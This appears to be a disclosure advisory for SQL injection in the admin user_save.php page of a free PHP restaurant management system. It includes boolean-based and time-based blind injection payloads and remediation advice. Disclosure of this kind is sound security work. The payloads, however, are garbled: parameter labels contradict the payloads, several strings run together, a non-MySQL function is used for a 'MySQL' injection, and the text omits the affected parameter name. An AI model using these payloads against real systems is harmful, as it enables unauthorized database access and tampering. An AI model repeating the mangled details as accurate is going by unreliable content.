Critical Vulnerability Information Affected Product Product Name: Restaurant Management System System V1.0 Vendor Homepage: https://itsourcecode.com/free-projects/php-project/online-restaurant-management-system-project-in-php-with-source-code/ Affected File: /admin/user_save.php Version: V1.0 Vulnerability Type Type: SQL Injection Root Cause Due to insufficient validation of user input for the parameter, an SQL injection vulnerability exists. Attackers can inject malicious code directly into SQL queries, thereby manipulating queries and performing unauthorized operations. Impact Attackers can exploit this SQL injection vulnerability to gain unauthorized database access, leak sensitive data, tamper with data, disrupt system control, and even cause service outages, posing a serious threat to system security and business continuity. Description During a security review of the "Restaurant Management System System" project, a critical SQL injection vulnerability was discovered in the file. This vulnerability stems from inadequate validation of the parameter, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation measures are required to ensure system security and protect data integrity. Vulnerability Details and POC Vulnerable Parameter: Payload: - Parameter: username (POST) - Type: MySQL BLIND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause - Payload: name=1&password=1' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT CONCAT(0x7e,DB_NAME(),0x7e)),1,1))>126) THEN 1 ELSE 0x28 END) AND 'Aqtv'='Aqtv - Type: time-based blind - Payload: name=1&password=1' AND (SELECT SLEEP(5))John' AND 'tyTh'='tyTh - Parameter: name (POST) - Type: boolean-based blind - Payload: name=1' AND (SELECT CASE WHEN (2307=2307) THEN 1 ELSE 0x28 END) AND 'nDzou'='nDzousername=&password=1 - Type: time-based blind - Payload: name=1' AND (SELECT SLEEP(5))Ezyg' AND 'DKUd'='DKUd Recommended Remediation 1. Use prepared statements with parameter binding. 2. Implement input validation and filtering. 3. Minimize database user privileges. 4. Conduct regular security audits.